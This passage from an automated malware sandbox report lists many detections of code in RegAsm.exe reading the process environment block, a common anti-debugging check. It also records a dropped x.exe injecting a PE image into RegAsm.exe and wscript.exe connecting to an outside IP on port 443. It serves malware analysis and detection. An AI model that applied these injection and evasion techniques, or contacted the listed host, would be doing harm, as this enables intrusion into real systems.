            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030060B8 mov ecx, dword ptr fs:[00000030h]6_2_030060B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD4144 mov eax, dword ptr fs:[00000030h]6_2_02FD4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD4144 mov eax, dword ptr fs:[00000030h]6_2_02FD4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD4144 mov ecx, dword ptr fs:[00000030h]6_2_02FD4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD4144 mov eax, dword ptr fs:[00000030h]6_2_02FD4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD4144 mov eax, dword ptr fs:[00000030h]6_2_02FD4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39148 mov eax, dword ptr fs:[00000030h]6_2_02F39148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39148 mov eax, dword ptr fs:[00000030h]6_2_02F39148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39148 mov eax, dword ptr fs:[00000030h]6_2_02F39148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39148 mov eax, dword ptr fs:[00000030h]6_2_02F39148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F41131 mov eax, dword ptr fs:[00000030h]6_2_02F41131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F41131 mov eax, dword ptr fs:[00000030h]6_2_02F41131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B136 mov eax, dword ptr fs:[00000030h]6_2_02F3B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B136 mov eax, dword ptr fs:[00000030h]6_2_02F3B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B136 mov eax, dword ptr fs:[00000030h]6_2_02F3B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B136 mov eax, dword ptr fs:[00000030h]6_2_02F3B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F70124 mov eax, dword ptr fs:[00000030h]6_2_02F70124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030150D9 mov eax, dword ptr fs:[00000030h]6_2_030150D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEA118 mov ecx, dword ptr fs:[00000030h]6_2_02FEA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEA118 mov eax, dword ptr fs:[00000030h]6_2_02FEA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEA118 mov eax, dword ptr fs:[00000030h]6_2_02FEA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEA118 mov eax, dword ptr fs:[00000030h]6_2_02FEA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE6F2 mov eax, dword ptr fs:[00000030h]6_2_02FBE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE6F2 mov eax, dword ptr fs:[00000030h]6_2_02FBE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE6F2 mov eax, dword ptr fs:[00000030h]6_2_02FBE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE6F2 mov eax, dword ptr fs:[00000030h]6_2_02FBE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC06F1 mov eax, dword ptr fs:[00000030h]6_2_02FC06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC06F1 mov eax, dword ptr fs:[00000030h]6_2_02FC06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFD6F0 mov eax, dword ptr fs:[00000030h]6_2_02FFD6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD36EE mov eax, dword ptr fs:[00000030h]6_2_02FD36EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6D6E0 mov eax, dword ptr fs:[00000030h]6_2_02F6D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6D6E0 mov eax, dword ptr fs:[00000030h]6_2_02F6D6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F736EF mov eax, dword ptr fs:[00000030h]6_2_02F736EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300972B mov eax, dword ptr fs:[00000030h]6_2_0300972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A6C7 mov ebx, dword ptr fs:[00000030h]6_2_02F7A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A6C7 mov eax, dword ptr fs:[00000030h]6_2_02F7A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4B6C0 mov eax, dword ptr fs:[00000030h]6_2_02F4B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF6C7 mov eax, dword ptr fs:[00000030h]6_2_02FFF6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F716CF mov eax, dword ptr fs:[00000030h]6_2_02F716CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301B73C mov eax, dword ptr fs:[00000030h]6_2_0301B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301B73C mov eax, dword ptr fs:[00000030h]6_2_0301B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301B73C mov eax, dword ptr fs:[00000030h]6_2_0301B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301B73C mov eax, dword ptr fs:[00000030h]6_2_0301B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F376B2 mov eax, dword ptr fs:[00000030h]6_2_02F376B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F376B2 mov eax, dword ptr fs:[00000030h]6_2_02F376B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F376B2 mov eax, dword ptr fs:[00000030h]6_2_02F376B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F766B0 mov eax, dword ptr fs:[00000030h]6_2_02F766B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03013749 mov eax, dword ptr fs:[00000030h]6_2_03013749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7C6A6 mov eax, dword ptr fs:[00000030h]6_2_02F7C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D6AA mov eax, dword ptr fs:[00000030h]6_2_02F3D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D6AA mov eax, dword ptr fs:[00000030h]6_2_02F3D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F44690 mov eax, dword ptr fs:[00000030h]6_2_02F44690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F44690 mov eax, dword ptr fs:[00000030h]6_2_02F44690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC368C mov eax, dword ptr fs:[00000030h]6_2_02FC368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC368C mov eax, dword ptr fs:[00000030h]6_2_02FC368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC368C mov eax, dword ptr fs:[00000030h]6_2_02FC368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC368C mov eax, dword ptr fs:[00000030h]6_2_02FC368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F72674 mov eax, dword ptr fs:[00000030h]6_2_02F72674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A660 mov eax, dword ptr fs:[00000030h]6_2_02F7A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7A660 mov eax, dword ptr fs:[00000030h]6_2_02F7A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F79660 mov eax, dword ptr fs:[00000030h]6_2_02F79660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F79660 mov eax, dword ptr fs:[00000030h]6_2_02F79660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5C640 mov eax, dword ptr fs:[00000030h]6_2_02F5C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030137B6 mov eax, dword ptr fs:[00000030h]6_2_030137B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5E627 mov eax, dword ptr fs:[00000030h]6_2_02F5E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F626 mov eax, dword ptr fs:[00000030h]6_2_02F3F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F76620 mov eax, dword ptr fs:[00000030h]6_2_02F76620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F78620 mov eax, dword ptr fs:[00000030h]6_2_02F78620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4262C mov eax, dword ptr fs:[00000030h]6_2_02F4262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82619 mov eax, dword ptr fs:[00000030h]6_2_02F82619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F43616 mov eax, dword ptr fs:[00000030h]6_2_02F43616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F43616 mov eax, dword ptr fs:[00000030h]6_2_02F43616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F71607 mov eax, dword ptr fs:[00000030h]6_2_02F71607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBE609 mov eax, dword ptr fs:[00000030h]6_2_02FBE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7F603 mov eax, dword ptr fs:[00000030h]6_2_02F7F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5260B mov eax, dword ptr fs:[00000030h]6_2_02F5260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F447FB mov eax, dword ptr fs:[00000030h]6_2_02F447FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F447FB mov eax, dword ptr fs:[00000030h]6_2_02F447FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4D7E0 mov ecx, dword ptr fs:[00000030h]6_2_02F4D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F627ED mov eax, dword ptr fs:[00000030h]6_2_02F627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F627ED mov eax, dword ptr fs:[00000030h]6_2_02F627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F627ED mov eax, dword ptr fs:[00000030h]6_2_02F627ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4C7C0 mov eax, dword ptr fs:[00000030h]6_2_02F4C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F457C0 mov eax, dword ptr fs:[00000030h]6_2_02F457C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F457C0 mov eax, dword ptr fs:[00000030h]6_2_02F457C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F457C0 mov eax, dword ptr fs:[00000030h]6_2_02F457C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03015636 mov eax, dword ptr fs:[00000030h]6_2_03015636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC07C3 mov eax, dword ptr fs:[00000030h]6_2_02FC07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6D7B0 mov eax, dword ptr fs:[00000030h]6_2_02F6D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F7BA mov eax, dword ptr fs:[00000030h]6_2_02F3F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FCF7AF mov eax, dword ptr fs:[00000030h]6_2_02FCF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FCF7AF mov eax, dword ptr fs:[00000030h]6_2_02FCF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FCF7AF mov eax, dword ptr fs:[00000030h]6_2_02FCF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FCF7AF mov eax, dword ptr fs:[00000030h]6_2_02FCF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FCF7AF mov eax, dword ptr fs:[00000030h]6_2_02FCF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC97A9 mov eax, dword ptr fs:[00000030h]6_2_02FC97A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F407AF mov eax, dword ptr fs:[00000030h]6_2_02F407AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300866E mov eax, dword ptr fs:[00000030h]6_2_0300866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300866E mov eax, dword ptr fs:[00000030h]6_2_0300866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF78A mov eax, dword ptr fs:[00000030h]6_2_02FFF78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F48770 mov eax, dword ptr fs:[00000030h]6_2_02F48770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50770 mov eax, dword ptr fs:[00000030h]6_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B765 mov eax, dword ptr fs:[00000030h]6_2_02F3B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B765 mov eax, dword ptr fs:[00000030h]6_2_02F3B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B765 mov eax, dword ptr fs:[00000030h]6_2_02F3B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3B765 mov eax, dword ptr fs:[00000030h]6_2_02F3B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F40750 mov eax, dword ptr fs:[00000030h]6_2_02F40750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82750 mov eax, dword ptr fs:[00000030h]6_2_02F82750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F82750 mov eax, dword ptr fs:[00000030h]6_2_02F82750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC4755 mov eax, dword ptr fs:[00000030h]6_2_02FC4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F53740 mov eax, dword ptr fs:[00000030h]6_2_02F53740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F53740 mov eax, dword ptr fs:[00000030h]6_2_02F53740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F53740 mov eax, dword ptr fs:[00000030h]6_2_02F53740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7674D mov esi, dword ptr fs:[00000030h]6_2_02F7674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7674D mov eax, dword ptr fs:[00000030h]6_2_02F7674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7674D mov eax, dword ptr fs:[00000030h]6_2_02F7674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39730 mov eax, dword ptr fs:[00000030h]6_2_02F39730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F39730 mov eax, dword ptr fs:[00000030h]6_2_02F39730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F75734 mov eax, dword ptr fs:[00000030h]6_2_02F75734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7273C mov eax, dword ptr fs:[00000030h]6_2_02F7273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7273C mov ecx, dword ptr fs:[00000030h]6_2_02F7273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7273C mov eax, dword ptr fs:[00000030h]6_2_02F7273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBC730 mov eax, dword ptr fs:[00000030h]6_2_02FBC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030016CC mov eax, dword ptr fs:[00000030h]6_2_030016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030016CC mov eax, dword ptr fs:[00000030h]6_2_030016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030016CC mov eax, dword ptr fs:[00000030h]6_2_030016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030016CC mov eax, dword ptr fs:[00000030h]6_2_030016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4973A mov eax, dword ptr fs:[00000030h]6_2_02F4973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4973A mov eax, dword ptr fs:[00000030h]6_2_02F4973A
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
